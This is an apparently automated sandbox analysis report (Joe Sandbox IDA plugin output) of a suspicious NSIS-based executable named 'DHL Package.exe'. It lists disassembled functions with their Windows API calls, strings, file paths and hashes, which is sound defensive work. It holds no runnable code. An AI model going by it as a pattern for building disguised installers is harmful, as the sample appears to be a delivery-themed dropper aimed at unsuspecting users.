Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e4b5ecac14f05fa2fd75170ea9dc483b74f0c48ec088bd1d9ad5172d207252c
Instruction ID: 1b8bdd5ad4fc83de7ba6cec7d94a6212227b50c179fbf06187fd9840cc1d6bdc
Opcode Fuzzy Hash: 8e4b5ecac14f05fa2fd75170ea9dc483b74f0c48ec088bd1d9ad5172d207252c
Instruction Fuzzy Hash: 44F18770D04229CBDF18CFA8C8946ADBBB1FF45305F25816ED852BB281D7386A86DF45

Function 00406739 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(77163420,00426758,00425F10,00405E01,00425F10,00425F10,00000000,00425F10,00425F10,77163420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,77163420,C:\Users\user\AppData\Local\Temp\), ref: 00406744
FindClose.KERNEL32(00000000), ref: 00406750

Strings

XgB, xrefs: 0040673A

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: XgB
API String ID: 2295610775-796949446
Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
Instruction ID: 870aa7139b81afaf1942c507467f7acad87ed8de72819481db2edd1f78cd0942
Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
Instruction Fuzzy Hash: 09D012316042305FC35127387E4C84B7B9A9F563393228B76B5AAF21E0C7748C3287AC

Function 00402902 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402911

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 3a3c8e021aac443e7d1b39a8b6dfaba58084c306ccb8c3208a910f709684840e
Instruction ID: 8edab8899b0228974304dfa76bdc964f5a5729fff09c5fb89d7f9bd6055596d6
Opcode Fuzzy Hash: 3a3c8e021aac443e7d1b39a8b6dfaba58084c306ccb8c3208a910f709684840e
Instruction Fuzzy Hash: ADF05E71A041049AC700DFA4D9499AEB374EF10314F61457BE912F21E0D7B85E119B2A

Function 00403E58 Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E94
ShowWindow.USER32(?), ref: 00403EB1
DestroyWindow.USER32 ref: 00403EC5
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EE1
GetDlgItem.USER32(?,?), ref: 00403F02
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F16
IsWindowEnabled.USER32(00000000), ref: 00403F1D
GetDlgItem.USER32(?,00000001), ref: 00403FCB
GetDlgItem.USER32(?,00000002), ref: 00403FD5
SetClassLongW.USER32(?,000000F2,?), ref: 00403FEF
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404040
GetDlgItem.USER32(?,00000003), ref: 004040E6
ShowWindow.USER32(00000000,?), ref: 00404107
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404119
EnableWindow.USER32(?,?), ref: 00404134
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040414A
EnableMenuItem.USER32(00000000), ref: 00404151
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404169
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040417C
lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004041A6
SetWindowTextW.USER32(?,00423708), ref: 004041BA
ShowWindow.USER32(?,0000000A), ref: 004042EE

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: d83b3cb20f42b8f676c26746797d707651e156971b34bf602c1fafe6ed444bae
Instruction ID: 0a9eb52b79e7a1f6ac08be675ff74ca1e342e547d7f0445f300758720cde36e9
Opcode Fuzzy Hash: d83b3cb20f42b8f676c26746797d707651e156971b34bf602c1fafe6ed444bae
Instruction Fuzzy Hash: 0EC1D0B1600305EBDB216F62ED88D2A3A78FB95745F51053EFA42B11F0CB794852DB2D

Function 00403AAA Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004067D0: GetModuleHandleA.KERNEL32(?,00000020,?,00403501,0000000B), ref: 004067E2
Part of subcall function 004067D0: GetProcAddress.KERNEL32(00000000,?), ref: 004067FD

lstrcatW.KERNEL32(1033,00423708), ref: 00403B2B
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\peggle,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,77163420), ref: 00403BAB
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\peggle,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403BBE
GetFileAttributesW.KERNEL32(Call), ref: 00403BC9
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\peggle), ref: 00403C12

Part of subcall function 00406322: wsprintfW.USER32 ref: 0040632F

RegisterClassW.USER32(004291C0), ref: 00403C4F
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C67
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C9C
ShowWindow.USER32(00000005,00000000), ref: 00403CD2
GetClassInfoW.USER32(00000000,RichEdit20W,004291C0), ref: 00403CFE
GetClassInfoW.USER32(00000000,RichEdit,004291C0), ref: 00403D0B
RegisterClassW.USER32(004291C0), ref: 00403D14
DialogBoxParamW.USER32(?,00000000,00403E58,00000000), ref: 00403D33

Strings

_Nb, xrefs: 00403C2E, 00403C96
Call, xrefs: 00403B72, 00403B7B, 00403B89, 00403BD8, 00403BDE
RichEd32, xrefs: 00403CE6
1033, xrefs: 00403ACA, 00403B26
RichEd20, xrefs: 00403CD8
.exe, xrefs: 00403BB8
Control Panel\Desktop\ResourceLocale, xrefs: 00403ADE
RichEdit20W, xrefs: 00403CF6, 00403CFC
C:\Users\user\AppData\Local\peggle, xrefs: 00403B3A, 00403B42, 00403BE5, 00403BEB, 00403BFB
RichEdit, xrefs: 00403D05
"C:\Users\user\Desktop\DHL Package.exe", xrefs: 00403AAE
.DEFAULT\Control Panel\International, xrefs: 00403B16
C:\Users\user\AppData\Local\Temp\, xrefs: 00403AAF

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\DHL Package.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\peggle$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-2256777239
Opcode ID: b857402c7fb4dacd26e5b8e2fc16868a27ef5d67229386ec777c0342ebdc81dd
Instruction ID: a24d2e849b10ad8e1ed533e9d37a820f5d0e6b510d4fa7617ff35d8301a60578
Opcode Fuzzy Hash: b857402c7fb4dacd26e5b8e2fc16868a27ef5d67229386ec777c0342ebdc81dd
Instruction Fuzzy Hash: E761B670244600BAD720AF669D45E2B3A7CEB84B0AF40457FFD41B62E2DB7D5912CA2D

Function 00403015 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403026
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL Package.exe,00000400,?,00000007,00000009,0000000B), ref: 00403042

Part of subcall function 00405ED1: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\DHL Package.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405ED5
Part of subcall function 00405ED1: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405EF7

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL Package.exe,C:\Users\user\Desktop\DHL Package.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
GlobalAlloc.KERNELBASE(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4

Strings

C:\Users\user\Desktop\DHL Package.exe, xrefs: 0040302C, 0040303B, 0040304F, 0040306F
C:\Users\user\Desktop, xrefs: 00403070, 00403075, 0040307B
Null, xrefs: 0040310C
soft, xrefs: 00403103
Inst, xrefs: 004030FA
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004031EB
Error launching installer, xrefs: 00403065
"C:\Users\user\Desktop\DHL Package.exe", xrefs: 00403015
C:\Users\user\AppData\Local\Temp\, xrefs: 0040301C

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\DHL Package.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL Package.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-3408820850
Opcode ID: 286758f993afdfee37dc791dabadca02854f419a97292f6ff8ee6bd162e70e0f
Instruction ID: a1180c22f2f56a455fdba696775536d8b2bad2e91b267b1d20a8a943b96b17b0
Opcode Fuzzy Hash: 286758f993afdfee37dc791dabadca02854f419a97292f6ff8ee6bd162e70e0f
Instruction Fuzzy Hash: DD51E571904204ABDB209F64DD81B9E7EACEB05316F20407BF905BA3D1C77D8E81876D

Function 00406418 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406559
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,?,0040547A,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00000000), ref: 0040656C
SHGetSpecialFolderLocation.SHELL32(0040547A,00418EC0,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,?,0040547A,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00000000), ref: 004065A8
SHGetPathFromIDListW.SHELL32(00418EC0,Call), ref: 004065B6
CoTaskMemFree.OLE32(00418EC0), ref: 004065C1
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065E7
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,?,0040547A,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00000000), ref: 0040663F

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 004065E1
Call, xrefs: 00406442, 0040651D, 00406524, 00406528, 00406542, 00406543, 00406558, 0040656B, 00406587, 004065B2, 004065E6, 004065EC, 00406608, 0040661B, 00406638, 0040663E, 0040664A, 0040667D
Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll, xrefs: 0040643D
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406529

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-2890755401
Opcode ID: 9a1e46779e3f4c632189bbfeb73c6a2e1f9e523224e90cf48f6d36dd640252de
Instruction ID: 14d1193dfffb306d7d50c4759d5107437c4365ff0453e231a2932b6079d00088
Opcode Fuzzy Hash: 9a1e46779e3f4c632189bbfeb73c6a2e1f9e523224e90cf48f6d36dd640252de
Instruction Fuzzy Hash: 27612771A00111ABDF209F24ED40ABE37A5AF54314F12813FE943B62D0DB3E89A2CB5D

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\peggle\Dilettantkomediers,?,?,00000031), ref: 004017D5

Part of subcall function 004063DB: lstrcpynW.KERNEL32(?,?,00000400,00403560,00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 004063E8

Part of subcall function 00405443: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000,?), ref: 0040547B
Part of subcall function 00405443: lstrlenW.KERNEL32(00403385,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000), ref: 0040548B
Part of subcall function 00405443: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00403385), ref: 0040549E
Part of subcall function 00405443: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll), ref: 004054B0
Part of subcall function 00405443: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054D6
Part of subcall function 00405443: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054F0
Part of subcall function 00405443: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054FE

Strings

C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll, xrefs: 00401835, 00401851
C:\Users\user\AppData\Local\peggle\Dilettantkomediers, xrefs: 0040179E
Call, xrefs: 0040178D, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nsl98D6.tmp, xrefs: 00401821, 0040183F

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp$C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll$C:\Users\user\AppData\Local\peggle\Dilettantkomediers$Call
API String ID: 1941528284-2794091021
Opcode ID: 81c736e87224b55c3f3289638049461dc0f47c27e624ea7ea6c04df356e87e40
Instruction ID: 099db37703b38b7faa9c4b3761aa4ffcdc8a6de3d1088dc1ecc91c4b2867a8b7
Opcode Fuzzy Hash: 81c736e87224b55c3f3289638049461dc0f47c27e624ea7ea6c04df356e87e40
Instruction Fuzzy Hash: BB41C171500118BACB10BFA5DC85DAE7A79EF41328F20423FF822B10E1C77C8A519A6E

Function 00405443 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000,?), ref: 0040547B
lstrlenW.KERNEL32(00403385,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000), ref: 0040548B
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00403385), ref: 0040549E
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll), ref: 004054B0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054D6
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054F0
SendMessageW.USER32(?,00001013,?,00000000), ref: 004054FE

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll, xrefs: 00405464, 00405474, 0040547A, 0040549D, 004054A9

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll
API String ID: 2531174081-3374124304
Opcode ID: cc04cc4826fc3d3b155713b60cdeb9a5eed99eab54f27ad30d7602578aff4a07
Instruction ID: 73e5e0af396a9b9ac9a9b02969ae59ee3043c4a39b1bd1f3be19a3319d016d01
Opcode Fuzzy Hash: cc04cc4826fc3d3b155713b60cdeb9a5eed99eab54f27ad30d7602578aff4a07
Instruction Fuzzy Hash: 14219D71900518BACB219F56DD44ACFBF79EF44350F10803AF904B62A0C7798A91DFA8

Function 004026E4 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 00402750
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4

Part of subcall function 00405FB2: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FC8

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870

Strings

9, xrefs: 00402733

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 763497bc60046be8c663aa09794d62d552ffb55bb47a76c8d3cda0648ce56c07
Instruction ID: 536e03bdd217ed40317c2037eab2912bbb9466327a1cdf3ab0e42e9fe4cfd002
Opcode Fuzzy Hash: 763497bc60046be8c663aa09794d62d552ffb55bb47a76c8d3cda0648ce56c07
Instruction Fuzzy Hash: 2751F975D00219EBDF20DF95CA89AAEBB79FF04304F50817BE501B62D0E7B49D828B58

Function 00405912 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405955
GetLastError.KERNEL32 ref: 00405969
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040597E
GetLastError.KERNEL32 ref: 00405988

Strings

C:\Users\user\Desktop, xrefs: 00405912
C:\Users\user\AppData\Local\Temp\, xrefs: 00405938

Memory Dump Source

